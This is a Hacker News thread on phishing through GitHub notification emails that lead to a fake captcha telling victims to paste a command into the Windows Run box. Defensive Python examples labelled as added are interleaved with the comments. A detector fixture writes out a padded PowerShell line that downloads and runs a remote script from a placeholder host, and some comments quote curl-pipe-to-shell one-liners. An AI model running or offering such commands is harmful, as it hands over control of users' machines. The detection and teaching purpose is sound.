GitHub notification emails used to send malware (ianspence.com)
467 points by crtasm 18 days ago | 178 comments



Do people really fall for a scam like that?

First, I assume the author knows the email came from GitHub, as the screenshot does not show this very clearly. If that's the case:

Red flag #1: the email links to a variation of a real domain. If you don't have information on who github-scanner.com is, it is pretty safe to assume it's a scam, just because it sounds like a real website.

GIANT Enormous Huge Red Flag #2: the captcha asks you to type a command in a shell. I have no comment on how naive one must be to do this.
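
The first red flag above, turned into a check you can run over every link in a notification before anyone clicks it. This is an added example, not code from the original post or from GitHub: the trusted-domain allowlist, the two-label "registrable domain" heuristic and the sample links are all constructed for the example, and a real deployment would use the Public Suffix List instead of the heuristic.

```python
from urllib.parse import urlparse

# Brand keyword -> registrable domains that genuinely belong to that brand.
# Constructed allowlist for this example; use your own inventory in practice.
# github.io (GitHub Pages) is deliberately absent: anyone can host content there.
TRUSTED_DOMAINS = {
    "github": {"github.com", "githubusercontent.com"},
}


def registrable_domain(host: str) -> str:
    """Return the last two labels of a hostname.

    Assumption for this example: no multi-label public suffixes such as co.uk.
    A production check should consult the Public Suffix List instead.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def classify_link(url: str) -> str:
    """Classify a link as 'trusted', 'lookalike' or 'unknown'.

    'lookalike' means the host contains a brand keyword (github-scanner.com,
    github.com.login.example) but its registrable domain is not on the
    allowlist, which is exactly the pattern the red flag describes.
    """
    host = (urlparse(url).hostname or "").lower()
    if not host:
        return "unknown"
    reg = registrable_domain(host)
    for brand, domains in TRUSTED_DOMAINS.items():
        if reg in domains:
            return "trusted"
        if brand in host:
            return "lookalike"
    return "unknown"


def triage(links):
    """Return only the links a human should look at, with their verdict."""
    return [(u, classify_link(u)) for u in links if classify_link(u) != "trusted"]


if __name__ == "__main__":
    # Constructed sample links, modelled on the notification in the article.
    sample = [
        "https://github.com/someorg/somerepo/issues/1",
        "https://github-scanner.com/verify",
        "https://github.com.login.example/auth",
        "https://example.org/unrelated",
    ]
    for url, verdict in triage(sample):
        print(f"{verdict:10} {url}")
```

The substring test is intentionally crude: it catches "brand-in-the-wrong-place" hosts but not IDN homoglyphs (a Cyrillic letter swapped into the name), which need a separate confusables check.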


It’s a numbers game.

Nobody is perfect. The more features of credibility, the more likely there will be a higher percentage of conversions. But not everybody has excellent vision, is free of time pressure, and is well rested.

There are lots of conditions that make otherwise difficult fraud targets easier to trick.

And if it can be done at large scale / automated, then small conversion rates turn into many successful frauds (compromised accounts).


I think they’re hoping for coincidences and the higher the numbers the more likely they’ll find one.

I got a real letter from the IRS two days before I got the scam message on my answering machine. The timing was uncanny and I might easily have fallen for it, had I not already dealt with it.

It’s the same for the Chinese language calls, if you speak Chinese it really resonates.

There was a scam in the 90s where you’d call a number and they’d give you sports betting advice. They’d do it for free as a promotion trying to sell their service when you won. They’d tell half the callers bet team A and the other half team B. The numbers made it work.

"Splitting games 50-50 like that—known in the biz as "double-siding"—is the oldest trick in the handicapper's very thick book. That way he knows he has at least some happy customers coming back."

https://vault.si.com/vault/1991/11/18/1-900-ripoffs-the-ads-...


Agree, I once fell for a scam that I think I otherwise wouldn't have, because of a string of circumstances: being tired and stressed, it being Christmas time and I had actually ordered stuff, but also because I had just upgraded iOS to the first version that put the address bar in Safari at the bottom of the screen instead of the top, so I forgot to check the domain!

I've since changed the address bar back to the top…

In the end I didn't lose anything but it was a good wakeup call for sure.


Thanks for this summary. People often forget they (hopefully) have grandmas, and that they themselves sometimes make mistakes as well, for whoever knows what reason. Sometimes.


If this was within my first year of owning a GitHub account, I would absolutely fall for this.

It's not much different from setting up your ssh key - something that you have to do; and new users also go through this workflow by copy pasting commands that GitHub sends them.


A prime example of how all the paranoid security hoops can easily make things more insecure in aggregate.

Since Microsoft embraced and extended it, GitHub has become one of the worst offenders.


A few weeks ago someone opened an issue in one of my repos. In under a minute two accounts replied with links to file lockers asking the user to download and try some software to solve their issue. No doubt it was malware. I promptly deleted the comments and reported the accounts to GitHub.

I wouldn’t have fallen for such an obvious ploy, but the original asker seemed like they weren’t particularly technical, judging by the sparse GitHub history and quality of the question. I could see them perhaps falling for that if they were uncritical and too eager to try anything.


Email from a different domain is unfortunately quite common. Citi and PayPal both do it for some emails. Pisses me off every time.


I just don't get it, how hard could it be? How expensive could this be? Because lots of times they just pay these damages to the customer, because no one knows how this very secure credit card data was compromised. This baffles me. Someone, please enlighten us, there must be a valid reason, at least from some angle.


Having a bunch of different domains can serve multiple purposes.

In GitHub's case, they already have githubusercontent.com to avoid serving untrusted stuff from their own github.com domain.

Sending marketing or security scanner (potentially very spammy) notification emails from separate domains can help with reputation too, to avoid your main domain getting marked as spam.

These are all legit; Amex having 20 different domains, half of which smell like phishing, and still sending emails from other domains is just incompetence. Something like marketing people or someone dealing with strategy deciding to do stuff in a certain way, with nobody technical in the room to tell them why that would be a problem. As an example, a friend of mine's organisation wanted to do a SaaS website for their niche, and a separate website to advertise the SaaS (separate domain, visual identity, everything).


My theory for most of these cases: they would need permission from who knows what department(s) to set up a subdomain of the main domain for their project, and it's easier to just purchase a new domain for the team/project.


Nailed it. This is 100% pragmatism/convenience-based decision making rooted in terrible culture, red tape, bad communication and dumb org charts.


Keep your SPF simple. Otherwise, make sure it works. Aaand, how many people actively monitor their DNS infrastructure?
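
An offline lint for an SPF record along the lines of the comment above, as an added example that is not taken from the page: it counts the terms that cost a DNS lookup against the RFC 7208 limit of 10 and flags the common misconfigurations. The record strings in the usage are constructed; nested includes are not resolved (that would need DNS), so the lookup count is a lower bound on what a receiver will actually do.

```python
import re

LOOKUP_MECHANISMS = {"include", "a", "mx", "ptr", "exists"}   # each costs a DNS lookup
NO_LOOKUP_MECHANISMS = {"ip4", "ip6", "all"}
LOOKUP_LIMIT = 10                                               # RFC 7208 section 4.6.4


def lint_spf(record: str) -> dict:
    """Statically check one SPF TXT record string; no DNS queries are made."""
    terms = record.strip().split()
    if not terms or terms[0].lower() != "v=spf1":
        return {"valid": False, "lookups": 0, "findings": ["not an SPF version 1 record"]}

    lookups = 0
    findings = []
    saw_all = saw_redirect = False
    for term in terms[1:]:
        t = term.lower()
        qualifier = "+"                      # RFC default when none is written
        if t and t[0] in "+-~?":
            qualifier, t = t[0], t[1:]
        if saw_all:
            findings.append(f"{term!r} comes after 'all' and is never evaluated")
            continue
        if "=" in t:                         # modifiers use name=value
            mod = t.partition("=")[0]
            if mod == "redirect":
                lookups += 1
                saw_redirect = True
            elif mod != "exp":               # 'exp' is exempt from the lookup limit
                findings.append(f"unknown modifier {term!r}")
            continue
        name = re.split(r"[:/]", t, maxsplit=1)[0]
        if name in LOOKUP_MECHANISMS:
            lookups += 1
            if name == "ptr":
                findings.append("'ptr' is deprecated (RFC 7208 section 5.5) and slow to evaluate")
        elif name == "all":
            saw_all = True
            if qualifier == "+":
                findings.append("'+all' lets any host on the internet send as this domain")
            elif qualifier == "?":
                findings.append("'?all' is neutral; receivers treat it much like having no SPF")
        elif name not in NO_LOOKUP_MECHANISMS:
            findings.append(f"unknown mechanism {term!r}")

    if lookups > LOOKUP_LIMIT:
        findings.append(f"{lookups} DNS lookups exceed the limit of {LOOKUP_LIMIT}; receivers return permerror")
    if not saw_all and not saw_redirect:
        findings.append("no 'all' or 'redirect='; the record ends in an implicit neutral result")
    return {"valid": True, "lookups": lookups, "findings": findings}


if __name__ == "__main__":
    # Constructed records: a sane one, an open one, and one over the lookup limit.
    for rec in [
        "v=spf1 include:_spf.google.com ~all",
        "v=spf1 ip4:192.0.2.0/24 +all",
        "v=spf1 a mx include:a.example include:b.example include:c.example "
        "include:d.example include:e.example include:f.example include:g.example "
        "include:h.example include:i.example -all",
    ]:
        print(rec, "->", lint_spf(rec))
```

Running this against the record you publish is the cheap half; the comment's real point stands, because the other half is re-running it whenever anyone adds an `include:` for a new SaaS vendor, which is how records quietly cross the limit.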


I'm old enough to remember ILOVEYOU. In the years after that I have seen millions and millions thrown into educating users not to click on the wrong things.

Last month I was at a conference where the keynote was from the CEO of a cyber security company. The whole point of the speech was that we need more money because in some cases more than 80% of users still fall for email scams. My very serious question to the speaker was: if after many millions and almost 25 years more than 80% of users still click on the wrong links, then maybe we are doing something really wrong?


We are, but people want convenience.

Try to get a company built around Word to use another tech that doesn't require running unsigned macros from emails...

You literally can't, they laugh at you for saying things like "don't use Microsoft".


They measure by clicks… but clicking a link doesn't mean you'll follow through and put in your username, password, and 2fa code.

Ultimately he's a businessman seeking more money. Doesn't mean he can be trusted.


In my opinion, these products are nothing but scams. I can’t use any links from work emails on my phone because I can’t see the domain of a link without previewing the page. IT told me I needed to change system-wide settings to disable previewing webpages in every app on my phone. Not happening.

Fortunately, my work email supports IMAP, so I can use a script to scan my inbox for fake phishing emails and delete them.


We are not doing anything wrong, but we are completely neglecting the attacker side.

All our actions are defensive.

Look at our physical security. Basically nothing is reasonably protected. 99% of stuff (buildings, locks) can be broken into with tools available in any Home Depot.

The key reason why it doesn't happen that much is because it's possible to find the attacker.

Why can any scammer just create a website without any traceability? It wouldn't be foolproof, but it would raise the bar.


> Why can any scammer just create a website without any traceability?

Because of jurisdictional challenges.

Not to mention that this very same traceability would be abused by some other authoritarian gov't to track down dissidents for example.

There's no real way to systematically have good security, if the human element is the weakest link tbh. Securing windows is not a technical problem, but a social and educational one.


More like no will.

Does the domain/server implement the required level? No? Block the connection. Ditto for email, with an automatic response.

Is your IP in a botnet? Cut it off.

Edit: I already get blocked connections (on the target site) because EU regulation is too onerous. I get reminded on basically every Google search that I am being censored (Some results may have been removed under data protection law in Europe).

Completely doable.


> I already get blocked connection (on target site) because EU regulation is too onerous

More like "we want to track every single user coming to our website without giving them the option to not be tracked".


You can serve consent form only to the connections from EU.

I have been part of several GDPR compliance projects and it's the other stuff that's the problem.

Data protection officer (recurring cost, even though it is only part of a job, not a full-time position), user data deletion and user data take-out. Compliance is not free. If the system wasn't designed for it from the beginning, it's really expensive to add.

Restore from backup after disaster recovery: make sure you anonymize/delete people who were deleted after the backup was made.

BTW, IP address is PII, so...

Honestly, it would be cheaper to buy everyone in the EU a VPN.


It's actually very simple & cheap to be compliant: stop tracking EU citizens.


> You can serve consent form only to the connections from EU.

Why? While I get that, if tracking is part of someone's business model, they want to track as many people as possible, I doubt it would be illegal to give also people that aren't in the EU the option to not be tracked. If it really would be so expensive to be compliant while also differentiating between users connecting from the EU and users connecting from outside the EU, why not just give everyone the option to choose if they want tracking as a measure to cut compliance cost?


What do you suggest? Bomb even more countries?


You don't need to bomb anyone.

Add IP rules at the cables in and out of, let's say, the EU and block it there.

Same way we deal with any non-compliant thing. You can't import it.

Your server/domain doesn't satisfy the requirements. Either the originator complies or not (e.g. through a trusted third party).


Because ip geolocation has always been reliable and never inaccurate?


No geolocation is needed. And even if it were, these are technical problems, inherently solvable.

So far, we are building walls and replacing the mortar with new mortar, while attackers bombard us with complete impunity. This is never going to work.

This would of course need new extensions/protocols (even the simplest would require an authentication envelope around encrypted traffic).


The problem is that you think a societal problem can be solved technically.


The whole point is to move from technical solution (i.e. current approach) to legal one.

Not a single response had anything to do with either problem ITA or my comment.

I am not sure if you are troll, 10 y/o or gpt1, but have a nice day.


Quite humble of you to presume anyone who disagrees with your "brilliant" idea has something wrong with their brain.


Do you think people should have to get permission to host a server on the internet?


> GIANT Enormous Huge Red Flag #2: the captcha asks you to type a command in a shell. I have no comment on how naive one must be to do this.

I guess the critical thinking of devs and wannabe devs has been softened by all the `curl <script> | bash` installation instructions.


Yeah exactly, I do that all the time when filling in captchas!


They do. Just after seeing instructions to run this, and complying:

> curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh

(Yup, .rs is the ccTLD for the Republic of Serbia, of former SFR Yugoslavia)


> the captcha asks you to type a command in a shell. I have no comment on how naive one must be to do this.

Someone who knows computers (like a programmer) might not fall for it, but people who do not know computers but are dabbling could easily fall for it.

The copied command specifically puts in a "user friendly captcha message" into the end, to overflow the run dialog textbox, so that a user who obeyed the instructions will see something vaguely resembling valid captcha verification:

   # " ''I am not a robot - reCAPTCHA Verification ID: 93752"

Phishing and scams are not about catching out pros, but catching out "normies".

It's quite scary that the scammers have put thought and effort into the method of infiltration, because this is "novel" as far as I have heard.
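
Detection logic for the padded clipboard command the comment above describes, run over process-creation telemetry. This is an added example, not part of the original article or of any product: the events are constructed stand-ins for the ParentImage/CommandLine fields of Sysmon Event ID 1 or Windows 4688 records, the `.invalid` host is a reserved placeholder for whatever the real payload fetched, and the indicator thresholds are my own choice.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal stand-in for a process-creation record."""
    parent_image: str
    command_line: str


# The Run dialog is hosted by explorer.exe, so a paste-and-Enter payload
# appears as a script interpreter spawned directly by Explorer.
RUN_DIALOG_PARENT = re.compile(r"(^|\\)explorer\.exe$", re.I)
INTERPRETER = re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript)(\.exe)?\b", re.I)
REMOTE_FETCH = re.compile(r"(\b(iwr|irm)\b|invoke-webrequest|invoke-restmethod|downloadstring|https?://)", re.I)
# Decoy text appended so the victim sees something captcha-like in the Run box.
DECOY = re.compile(r"(i am not a robot|captcha|verification id)", re.I)
# A long run of spaces pushes the real command past the Run box's visible width.
PADDING = re.compile(r"[ \t]{12,}")


def clickfix_signals(ev: ProcEvent) -> list[str]:
    """Return the individual indicators present in one event."""
    signals = []
    if RUN_DIALOG_PARENT.search(ev.parent_image):
        signals.append("spawned by explorer.exe (Run dialog)")
    if INTERPRETER.search(ev.command_line):
        signals.append("script interpreter")
    if REMOTE_FETCH.search(ev.command_line):
        signals.append("remote fetch")
    if DECOY.search(ev.command_line):
        signals.append("captcha decoy text")
    if PADDING.search(ev.command_line):
        signals.append("whitespace padding")
    return signals


def is_clickfix(ev: ProcEvent) -> bool:
    """Decoy text on an interpreter command line is conclusive on its own;
    otherwise require at least three of the weaker indicators together."""
    s = clickfix_signals(ev)
    if "captcha decoy text" in s and "script interpreter" in s:
        return True
    return len(s) >= 3


# Constructed sample telemetry. The first event mirrors the padded command the
# comment describes; the others are benign or only partially matching noise.
PAD = " " * 40
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              'powershell -w hidden -c "iwr http://example.invalid/verify.ps1 | iex"'
              + PAD + "# \" ''I am not a robot - reCAPTCHA Verification ID: 93752\""),
    ProcEvent(r"C:\Windows\explorer.exe", r"notepad.exe C:\Users\dev\notes.txt"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"powershell -NoProfile -File C:\build\deploy.ps1"),
    ProcEvent(r"C:\Windows\explorer.exe", "mshta http://example.invalid/verify.hta"),
]


def flagged(events) -> list[ProcEvent]:
    """Events that should raise an alert."""
    return [e for e in events if is_clickfix(e)]


if __name__ == "__main__":
    for ev in flagged(SAMPLE_EVENTS):
        print("ClickFix-style launch:", ev.command_line[:60], "...", clickfix_signals(ev))
```

The padding and decoy-comment indicators are the ones specific to this trick; the parent/interpreter/fetch trio on its own also fires on an admin who genuinely pastes a one-liner into Run, so in a real pipeline that weaker combination is a candidate for review rather than an automatic block.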


I can understand clicking on the link while not paying attention, but I do wonder how many people who are signed up on GitHub would follow through with pasting this command. I could understand if elderly non-technical people might follow up with it, but this one, I wonder what the rate is.


Just clicking on the link might be enough. Maybe you have a slightly outdated browser with a known vulnerability. Maybe you’re holding off on installing an update just to be sure it won’t break anything.

And even if everything is up to date Pwn2Own regularly shows that having a user browse to a website is enough to get root access. Thankfully most people don’t have to worry about this since they are unlikely to attract the attention of someone with that level of resources.


If I had those kinds of resources I might even put a captcha on the site that asks the user to do something incredibly stupid just to make them think they were in the clear.


Yeah, I think the barrier to get people to just click on a link (outside of e-mail as well) is very low, so that would be easy to affect anyone.


All valid points, but I will say services don't help in this situation - I received an email from @redditmail.com recently, which is real and part of reddit but feels off on first glance.

Couple that with gmail having no way to show the full email address (by default - I know you can hover, etc.), rather than the sender-provided "sender name", and my false-positive rate for at least double checking and confirming the sending domain is kinda high...better that than a bunch of false-negatives of course.


> Red flag #1: email links to a variation of real domain

It's too common, MS also does this, to be a red flag


> GIANT Enormous Huge Red Flag #2: the captcha asks you to type a command in a shell. I have no comment on how naive one must be to do this.

Funnily enough there's at least one legit captcha that has you do this: if you have JavaScript/WASM disabled it gives you the option of running the anti-DDOS proof-of-work in a shell and pasting the result in a textbox.


> Do people really fall for a scam like that?

You should put a "voice activated" sticker on a random break room appliance (toaster, water/ice dispenser, microwave, coffee machine, ...).

Don't use strong adhesive if your desk is within hearing distance.


You assume the scammers want everyone to fall for this trick.

The reality is different - they leave these huge red flags so that people who aren’t very bright or careful will fall for it.

That is the same reason why scammers put spelling mistakes in emails - not because they don’t know how to use spellcheck, but because they want to filter out those who would spot these mistakes.

They want to scam careless, gullible, "stupid" people, not someone who is careful enough to spot security red flags.


> Do people really fall for a scam like that?

I routinely get people opening issues on my projects asking where the source code is or how to fine tune their models on different data or even how to install pytorch.... There's a lot of people on GitHub that don't know the first thing about coding. There's a lot of people on GitHub that don't know how to use Google... This even includes people with PhDs...


I've also seen an issue on GitHub asking project author to add an entry in README.md with instructions on how to clone the repository...


Actually worth doing if the repo uses submodules.



The naive way in this case wouldn’t be to make an issue: How do I clone this repo? I see it has submodules

The naive way would be to just clone the repo without any (apparently) options.

I can attest to this because that’s probably what I would do.

The readme would not resolve a problem that someone knowingly had. It would resolve an unknown upcoming problem.


Yeah, git clone --recursive is the main thing I suggest. But unlike Google I include the exact command that you can copy and paste into the terminal to clone the specific repo in question.

And if you're reading the README after cloning it already, there are instructions for sorting that out too, also suitable for copy and paste.

Or if you downloaded the ZIP from GitHub - I'm sorry. But you won't be left too confused, at least you won't if you read my README, because my README covers this situation as well.

(Also: don't forget to git submodule update after changing branch! But if you're noting everything my README tells you, you won't.)


Not only does it ask you to copy and paste a command in shell, but Windows apparently warns you that it will run with admin privileges.

Aside from that:

> Nowhere in the email does it say that this is a new issue that has been created, which gives the attacker all the power to establish whatever context they want for this message.

What about the non-user-controlled "(Issue #1)" in the subject line?


Red flag #3: "Github Security Team"

A legitimate GitHub email would never mis-capitalize the company name like that. It would be GitHub, as shown in the footer that the attacker does not control.

OTOH, this is a very common mistake. The article alternates between the correct GitHub and the incorrect Github. So it would be easy to not notice that error.


> Do people really fall for a scam like that?

Yes. It wouldn't be a thing otherwise. I know at least two fairly intelligent people, one literally being a Mensa member, who fell for sextortion emails and got their files encrypted.

Scareware is based on social engineering, and is crafted to trigger emotional response, not educated one.


Just to let you know, even GitHub themselves use multiple domains instead of just subdomains of github.com (see githubnext.com).

So, I wouldn't blame the victims here if the service itself does not realize why that is not such a good idea.


Yeah.. I don't like when companies do that. I usually Google the domain first to see if it's legit, but even that isn't foolproof.


re #1: the email could link to a GitHub Pages site hosting the same malware...

re #2: it doesn't really have you typing into a shell, 'just paste'


Honestly I would have typed commands in a shell if a "captcha" asked me to. Just to see the scale of the outcome's awfulness.

I'm almost bored enough to just start installing weird malware for research and funsies


Everyone has been trained for years to do this:

curl http://obscure.url?random-string | sh


If there were a legitimate looking GitHub how-to page that asked me to do that, I can see myself doing it. Fortunately, I ignore all security issues on my repositories.


Security by lack thereof


No they haven’t, they’ve been trained to do

    curl https://url-of-well-known-project | sh 
I may not trust the owners of a random domain, but I certainly trust the owners of rustup.rs not to do anything intentionally malicious.


Then you are more trusting of the Serbian National Internet Domain Registry than you should be.


Microsoft owns more domain names than there are neurons in the brain.


people make a lot of noise about piping into shell, but even if the instructions were

wget random.club/rc-12-release.sh

chmod +x ./rc-12-release.sh

./rc-12-release.sh

almost nobody would actually read the script before running it


Well yeah, if your intention is to install software from random.club on your system, what would be the point of checking the installer script? The worst thing it can do is the same thing you want it to do.


Yes, which is why complaining about curl | sh is silly.


I’m not disagreeing.


or even this:

git clone http://github.com/unknown/repo.git && cd repo && npm install


Even worse:

$ svn checkout

$ ./configure

$ make

# make install


Another red flag. I cannot take any project seriously that has this in its documentation.


You prefer that they wrap it in an .msi file and put it on that same website? What do you think the advantages of that are?


I guess you don’t think the Rust programming language is a serious project, then?


I mean they even named the website cargo, after cargo culting! (jk)


What is the more secure way in your opinion? What is the weak link here? TLS transport? Possibly compromised hosting/codebase? Trust in app authors? Not reading the shell script? Checking a signature of some file?


My issue is the bypassing of the system's package manager. Doing so will result in files spread somewhere over the system. How do you uninstall such a thing properly? How do you update (or even know) its dependencies? Will it break because I uninstall or update one of its dependencies?

Linux has had very good package management for many years. I see absolutely no reason to break this by creating shell installers.


I got a much more convincing email from PayPal recently: someone sent a quote (apparently a feature that can be used unsolicited), and set their company name to something like "PayPal need to get in touch about your recent payment of $499.00, please call +1-....", so this is most of the text at the top, because their quotes email is "<name> is sending you a quote for $xxx".

This email came from the real paypal.com; how they haven't gotten on top of usernames like that is beyond me for a payment processor. I reported it to them but haven't heard anything back; hopefully they banned that account, but they should ban all names like that.

This email honestly was formatted to look like a legit PayPal email, I have to imagine that scam will trick a lot of normal people.

Get in touch, see my bio website, if you want the email.
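
The crafted-company-name trick described above, reduced to the validation a platform could apply before a merchant-supplied name lands in its own transactional template. This is an added example and not PayPal's code (whatever checks they really run are not visible here): the `render_quote_subject_unsafe` template, the sample name, the length limit and the brand pattern are all constructed for the example.

```python
import re

MAX_NAME_LEN = 64   # assumed limit for this example; real platforms set their own
# Phone pattern is deliberately loose (7+ digits with separators); it will also
# catch year ranges like "2019-2024", which is an acceptable false positive here.
PHONE = re.compile(r"\+?\d[\d\s().-]{5,}\d")
URL = re.compile(r"(https?://|www\.)", re.I)
MONEY = re.compile(r"[$€£]\s?\d")
CALL_TO_ACTION = re.compile(
    r"\b(call|contact us|urgent|suspended|unauthori[sz]ed|get in touch)\b", re.I)
PLATFORM_BRAND = re.compile(r"\bpay\s?pal\b", re.I)   # assumed: the platform's own brand


def display_name_problems(name: str) -> list[str]:
    """Reasons a merchant name should not be rendered verbatim into email copy."""
    problems = []
    if len(name) > MAX_NAME_LEN:
        problems.append("longer than a plausible business name")
    if PHONE.search(name):
        problems.append("contains a phone number")
    if URL.search(name):
        problems.append("contains a URL")
    if MONEY.search(name):
        problems.append("contains a money amount")
    if CALL_TO_ACTION.search(name):
        problems.append("contains call-to-action or urgency wording")
    if PLATFORM_BRAND.search(name):
        problems.append("impersonates the platform brand")
    return problems


def render_quote_subject_unsafe(sender_name: str, amount: str) -> str:
    """The pattern the comment describes: user-controlled text goes straight
    into the platform's own, fully legitimate template."""
    return f"{sender_name} is sending you a quote for {amount}"


def render_quote_subject(sender_name: str, amount: str) -> str:
    """Hardened version: refuse names that carry their own message."""
    problems = display_name_problems(sender_name)
    if problems:
        raise ValueError("rejected sender name: " + "; ".join(problems))
    return render_quote_subject_unsafe(sender_name, amount)


if __name__ == "__main__":
    # Constructed sample modelled on the comment; the phone number is fictional.
    scam_name = ("PayPal need to get in touch about your recent payment of $499.00, "
                 "please call +1-800-555-0199")
    print(render_quote_subject_unsafe(scam_name, "$499.00"))
    print(display_name_problems(scam_name))
    print(render_quote_subject("Acme Widgets Ltd", "$120.00"))
```

The point of the split into two functions is that the template itself is not the bug; the missing step is treating the name field as attacker-controlled input to the platform's own trusted sender identity, which is why checking the From address does not help the recipient here.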


Had this happen to me over a year ago so I assume reporting it to them did nothing :)


I got a very similar thing: a legit email from PayPal, but it's an invoice and not a quote. And when you login to PayPal the website shows nothing.


Why would PayPal email you to call them? If they want something from you they should either call you, or email it to you, or show it in their portal.


I don't know, most PayPal customers wouldn't know either. And the point is that these emails are designed to look legit and also scare you into taking action without thinking about it too hard. And this particular email bypasses a lot of the rules in general consciousness about phishing like "check for spelling mistakes, check the sender email, does it look official, does it mention you by name", all of those boxes are ticked. This is only possible because PayPal clearly aren't actively fighting against these kinds of attacks.


I'd be surprised if someone looked at it.


> This email honestly was formatted to look like a legit PayPal email,

This is why anything but plain text should be blocked in emails (besides the security reasons). Anybody with 5 minutes of HTML experience can create "legit looking" emails.


It was an actual email sent by PayPal via a service they offer (sending invoices), just with a smartly crafted company name that made it look like it's from them. No HTML was required from the attacker.


Legit looking because it was formatted by PayPal themselves, and also sent from PayPal.com.


      Press Win+R, CTRL+V <enter>

From captcha to gotcha.

I could see junior developers falling for this. Hey it's GitHub, it's legit right? We get security notifications every second month about some lib everyone uses etc.

      "Oh look, captcha by running code, how neat!"

I don't think webpages should be able to fill your copy/paste buffer from a click without a content preview. They made it require a user action, such as clicking, thinking that would solve the problem, but it's still too weak. That's problem number 1.

People need to stop actioning any links from emails and/or believing that any content in an email has legitimacy. It doesn't. That's problem number 2.

Problem number 3, Windows still lets you root a machine with 1 line in PowerShell? What the @$$%&%&#$?

GitHub might need to stop people putting links in issues without them being checked by automated services that can validate the content as remotely legitimate. They're sending this stuff to people's email; don't tell me they're not aware this could be used for phishing! That's cyber security 101, in 2015.

Finally, GitHub, being unable to act on the above, may need to better strip what they email to people, and essentially behave more like banks: "you have a new issue in this repository..." and that's that. You then go there, there is no message, ok great. That would have taken care of this issue...

It seems GitHub needs to graduate a bit here.


"I could see junior developers falling for this" - I can see all sorts fucking up, not just juniors. It is the way of things.

"I don't think that...". I think that you have to train your troops effectively in what is harmful.

"Windows" - yes. I have been asked by at least two of my employees to get them away from Windows. I'll do my best. It's been a long running project but I will succeed.


> Problem number 3, Windows still lets you root a machine with 1 line in PowerShell? What the @$$%&%&#$?

*sigh* It needs to be run under an account with admin privileges for that. The shield on the "Run" dialog screenshot clearly indicates that it was taken under a user with admin privileges and UAC disabled.

Come on, now cry that Linux still lets you root a machine with 1 line in curl malware.zyx/evilscript | bash.


> … by 1 line in curl malware.zyx/evilscript | bash.

Making the script POSIX compliant would allow hacking computers without bash. Then you can pipe it into just “sh” which is guaranteed to be on the PATH.


> it was taken under a user with admin privileges and UAC disabled.

You will have to accept that users either ask for this UAC to be turned off, or it gets turned off by the original installer of Windows for the user (presumably a non-technical user).

It's like telling traffic accident sufferers that they should've put on a seatbelt. True, but pointless.


> you will have to accept that users either ask for this UAC to be turned off

Running with UAC disabled under an admin account?

That's not only a lack of a seatbelt, but wearing flip-flops too.

And I'm eating my own dogfood too: I've been running under a regular user since I migrated from Vista, both on personal and work devices. Sometimes it's a PITA, sure, but it's manageable.


> Come on, now cry that Linux still lets you root a machine with 1 line in curl malware.zyx/evilscript | bash.

Excuse me, but some of us prefer to let evil scripts root our machines via pure sh, thank you very much.


Glad I’m not the only one thinking about POSIX compliance!


I've started disabling the Run dialog for non-technical users, but unfortunately a GitHub attack targets users who likely have a real use for it sometimes.

The clipboard strategy feels like it should be easy to block too, most scammers just convince people to type a well-obscured URL into the Run dialog manually over the phone.


> The clipboard strategy feels like it should be easy to block too

Yeah, the browser should actually have each site ask for permission to modify the clipboard imho.


That might add another step but I think it is unlikely to help reduce the number of victims. If someone is willing to bring up the run prompt and paste whatever they have in the clipboard they are also likely to be social engineered into clicking yes on a dialog that tells them to allow clipboard modification.


This captcha is so bad... I'm gonna automate the solving of this captcha so whenever my browser shows me "Press Win+R, CTRL+V <enter>", it automatically runs cmd.exe with the clipboard content so I can get to the site content faster and with no interruption.

Yes, I'm a 10X Windows user.


> Windows still lets you root a machine with 1 line in PowerShell? What the @$$%&%&#$?

You say it's a problem, I say it is a virtue.

We can "root" Windows because we are root, specifically a user in the Administrators group because the first user account configured by Windows Setup is always an administrator account.

This is a virtue. We can do whatever we want with the computer we own and use. This is freedom par excellence that literally every other operating system family today wishes they could do without getting shouted down.

In an era of increasingly locked down operating systems that prevent us from truly owning our computers, administering them, Windows just lets us do that. I hope to god this never changes.


>> Windows still lets you root a machine with 1 line in PowerShell? What the @$$%&%&#$?

> We can do whatever we want with the computer we own and use.

There is a difference between what an owner of a computer can and should be able to do, versus what an arbitrary actor can do to a computer they do not own through subterfuge. It is the responsibility of an Operating System to facilitate the former and guard against the latter.

MS Windows has a poor history of being able to do either.


Remember the old saying: With great power comes great responsibility.

Windows just lets us do anything and everything, and it's up to us how we want to secure it if at all.

Every other operating system family tries to realize security by straight up locking the user, the administrator, out of his own computer. They still get compromised, by the way.

Windows has absolutely succeeded and continues to succeed in enabling the user, including security if he so desires. This is the reason Windows became the dominant desktop OS. The others? Nope on both counts. The Linux world in particular always screams about user freedom, yet ironically it's Windows and its community that actually makes that freedom a reality.

Once more: I hope to god this never changes.


This is a wild take. Would you mind expanding a bit on the oppressive, locked down ecosystem that’s choking the free expression of Linux users?


For starters it's security theater, given everyone and their dog prefixes sudo to all commands without much thinking. There are also some who just smash in sudo -i as the first thing they ever do upon boot (guilty as charged) because they suffer RSI from typing sudo a trillion times.

There's also this impression that the operating system is just secure and you as the user are just protected like it's a law of physics. Spoiler alert, you are not and it's not a law of physics either. It's still your responsibility to secure the computer if you so desire and otherwise not do dumb shit like copypasta'ing commands from the internet.

I'm not even going to get into the politics that are package managers and repos, that's just straight bullshit that has more to do with human nature than computer science.

Speaking of politics, most of the FOSS community at large hates users using and administrators administering computers how they want. You must subscribe to the One Libre Way(tm) or you are a heathen doing it wrong. So much for freedom. The Windows community meanwhile is mostly composed of jaded engineers who are just happy to see others get stuff done and get through another day in one piece.

Windows from the start places the user at the controls with mostly no child safety locks in place (and you can remove what is there easily, eg: UAC), and with that power you have to accept that if you end up hosing the system the problem is you because Windows doesn't even pretend to really protect you.

Having the sheer power to hose Windows with a single Powershell line is what freedom is. Freedom is both delightful and horrifying.


> Windows from the start places the user at the controls

Would this be the same Windows that now requires TPM2, UEFI Secure Boot, a Microsoft account to log in, and a special boot mode to use drivers not signed by Microsoft?


What I am writing below I mean genuinely, without malice, and in the hope it helps dispel some of the conclusions you have expressed above, if not for Linux itself (which I do not normally use) then for other Unix operating systems such as FreeBSD[0].

> For starters it's security theater, given everyone and their dog prefixes sudo to all commands without much thinking.

